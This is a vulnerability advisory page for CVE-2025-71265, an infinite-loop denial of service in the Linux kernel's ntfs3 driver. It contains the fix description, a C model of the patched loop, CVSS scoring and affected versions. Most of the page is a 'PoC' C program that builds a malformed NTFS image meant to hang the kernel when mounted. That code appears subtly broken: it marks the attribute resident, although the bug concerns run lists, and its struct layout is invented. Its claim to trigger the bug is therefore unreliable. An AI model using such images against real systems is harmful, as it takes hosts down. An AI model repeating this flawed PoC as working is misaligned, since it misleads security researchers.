Security Vulnerability Report

CVE-2025-71265 CVSS 5.5 MEDIUM

Published: 2026-03-18 11:16:15
Last Modified: 2026-05-20 19:43:23
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

fs: ntfs3: fix infinite loop in attr_load_runs_range on inconsistent metadata

We found an infinite loop bug in the ntfs3 file system that can lead to a Denial-of-Service (DoS) condition.

A malformed NTFS image can cause an infinite loop when an attribute header indicates an empty run list, while directory entries reference it as containing actual data. In NTFS, setting evcn=-1 with svcn=0 is a valid way to represent an empty run list, and run_unpack() correctly handles this by checking if evcn + 1 equals svcn and returning early without parsing any run data. However, this creates a problem when there is metadata inconsistency, where the attribute header claims to be empty (evcn=-1) but the caller expects to read actual data. When run_unpack() immediately returns success upon seeing this condition, it leaves the runs_tree uninitialized with run->runs as NULL. The calling function attr_load_runs_range() assumes that a successful return means that the runs were loaded and sets clen to 0, expecting the next run_lookup_entry() call to succeed. Because runs_tree remains uninitialized, run_lookup_entry() continues to fail, and the loop increments vcn by zero (vcn += 0), leading to an infinite loop.

This patch adds a retry counter to detect when run_lookup_entry() fails consecutively after attr_load_runs_vcn(). If the run is still not found on the second attempt, it indicates corrupted metadata and returns -EINVAL, preventing the Denial-of-Service (DoS) vulnerability.
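To make the fix pattern in the description concrete, here is an added C model of the attr_load_runs_range() loop with its retry counter; it is not the ntfs3 source, and the runs_tree layout, the run_lookup_entry() implementation and the attr_load_runs_vcn() stand-in (which reproduces the "success without loading anything" case) are assumptions constructed for the model.

```c
/* Added model of the attr_load_runs_range() loop from the description; it is not
 * the ntfs3 source. On a runs_tree that was never populated every lookup misses,
 * so without a bound clen stays 0 and "vcn += clen" never advances. The retry
 * counter turns the second consecutive miss into -EINVAL. All types and the
 * attr_load_runs_vcn() stand-in below are constructed for this model. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#define EINVAL 22
typedef uint64_t CLST;
struct run_entry { CLST vcn, len; };
struct runs_tree { struct run_entry *runs; size_t count; }; /* runs == NULL: unloaded */

/* True, with *len = clusters left in the run, when vcn lies inside a loaded run. */
static bool run_lookup_entry(const struct runs_tree *run, CLST vcn, CLST *len)
{
	for (size_t i = 0; run->runs && i < run->count; i++) {
		CLST start = run->runs[i].vcn, end = start + run->runs[i].len;
		if (vcn >= start && vcn < end) {
			*len = end - vcn;
			return true;
		}
	}
	return false;
}

/* Stand-in for attr_load_runs_vcn() in the inconsistent case: the header claims
 * evcn == -1 (empty run list), run_unpack() reports success, nothing is added. */
static int attr_load_runs_vcn(struct runs_tree *run, CLST vcn) { (void)run; (void)vcn; return 0; }

/* Fixed loop: 0 when [vcn, end) is covered by runs; -EINVAL when a lookup still
 * misses right after a load, which only corrupted metadata can produce. */
int attr_load_runs_range(struct runs_tree *run, CLST vcn, CLST end)
{
	int retry = 0;
	for (CLST clen = 0; vcn < end; vcn += clen) {
		if (run_lookup_entry(run, vcn, &clen)) {
			retry = 0;
			continue;
		}
		if (++retry > 1)
			return -EINVAL; /* second consecutive miss after a load */
		int err = attr_load_runs_vcn(run, vcn);
		if (err)
			return err;
		clen = 0; /* re-check vcn against the run that should now be loaded */
	}
	return 0;
}
```

Without the `++retry > 1` check, the empty-tree case below would loop forever exactly as the description states; with it, the call returns -EINVAL on the second miss.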

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel ntfs3 < fixed version
Check each distribution's security advisory for the specific fixed version.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-71265 PoC - Malformed NTFS Image Generator
// This PoC demonstrates the infinite loop vulnerability in ntfs3
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma pack(push, 1)
// NTFS Boot Sector
struct ntfs_boot_sector {
    uint8_t jump[3];
    uint8_t oem_id[8];
    uint16_t bytes_per_sector;
    uint8_t sectors_per_cluster;
    uint16_t reserved_sectors;
    uint8_t fats;
    uint16_t root_entries;
    uint16_t sectors;
    uint8_t media_type;
    uint16_t sectors_per_fat;
    uint16_t sectors_per_track;
    uint16_t heads;
    uint32_t hidden_sectors;
    uint32_t large_sectors;
    uint64_t total_sectors;
    int64_t mft_lcn;
    int64_t mft_mirror_lcn;
    int32_t clusters_per_mft_record;
    int32_t clusters_per_index_record;
    int64_t serial_number;
    uint32_t checksum;
    uint8_t bootstrap[426];
    uint16_t end_marker;
};

// NTFS Attribute Header (resident)
struct ntfs_attr_header {
    uint32_t type;
    uint16_t length;
    uint8_t name_length;
    uint16_t name_offset;
    uint16_t flags;
    uint16_t instance;
    uint8_t resident;
    uint8_t name_length2;
    uint16_t offset;
    uint32_t length2;
    uint16_t allocated;
    uint8_t flags2;
    uint8_t reserved;
};
#pragma pack(pop)

void create_malformed_ntfs_image(const char *filename)
{
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to create file");
        return;
    }

    // Create a minimal NTFS image with malformed metadata
    unsigned char sector[512] = {0};

    // Boot sector
    struct ntfs_boot_sector *boot = (struct ntfs_boot_sector *)sector;
    memcpy(boot->oem_id, "NTFS    ", 8);   // full 8-byte OEM ID (space padded)
    boot->bytes_per_sector = 512;
    boot->sectors_per_cluster = 1;
    boot->total_sectors = 1024;
    boot->mft_lcn = 2;
    boot->clusters_per_mft_record = -1;    // 512 bytes
    boot->serial_number = 0x1234567890ABCDEF;
    boot->end_marker = 0xAA55;
    fwrite(sector, 512, 1, fp);

    // MFT Record with malformed attribute
    unsigned char mft_record[1024] = {0};

    // Create attribute with evcn=-1 but referenced data
    struct ntfs_attr_header *attr = (struct ntfs_attr_header *)(mft_record + 56);
    attr->type = 0x80;        // $DATA
    attr->length = 72;
    attr->resident = 1;
    attr->length2 = 0;        // Empty length - represents evcn=-1 condition
    attr->allocated = 0;
    // This creates the inconsistency: attribute header says empty,
    // but directory entry references it as containing data
    fwrite(mft_record, 1024, 1, fp);

    // Fill rest with zeros
    memset(sector, 0, 512);
    for (int i = 0; i < 1021; i++) {
        fwrite(sector, 512, 1, fp);
    }

    fclose(fp);
    printf("Malformed NTFS image created: %s\n", filename);
    printf("Mount this image to trigger the infinite loop in attr_load_runs_range\n");
}

int main(void)
{
    create_malformed_ntfs_image("cve-2025-71265.ntfs");
    return 0;
}
```

References

Record Details (from the raw NVD JSON, which is truncated on this page)

Status
Analyzed
Weakness
CWE-835 (Loop with Unreachable Exit Condition, 'Infinite Loop')
Exploitability Score
1.8
Impact Score
3.6
Affected Version Ranges (CPE match entries)
Linux kernel 5.15 up to, excluding, 5.15.202
Linux kernel 5.16 up to, excluding, 6.1.165
Linux kernel 6.2 up to, excluding, 6.6.128
The remaining CPE match entries are cut off where the record is truncated.